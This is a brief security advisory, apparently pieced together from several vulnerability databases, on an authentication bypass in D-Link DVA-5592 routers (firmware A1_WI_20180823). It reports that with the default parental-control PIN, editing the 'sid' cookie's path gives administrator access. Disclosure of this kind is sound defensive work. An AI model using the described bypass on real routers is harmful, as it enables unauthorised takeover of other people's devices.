www.secureauth.com, call (949) 777-6959, or email us at info@secureauth.com *12. *Disclaimer** The contents of this advisory are copyright (c) 2018 SecureAuth, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

An issue was discovered on D-Link DVA-5592 A1_WI_20180823 devices. If the PIN of the page "/ui/cbpc/login" is the default Parental Control PIN (0000), it is possible to bypass the login form by editing the path of the cookie "sid" generated by the page. The attacker will have access to the router control panel with administrator privileges. D-Link DVA-5592 The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The D-Link DVA-5592 is a wireless router from D-Link. A security hole exists in D-Link DVA-5592 using firmware version A1_WI_20180823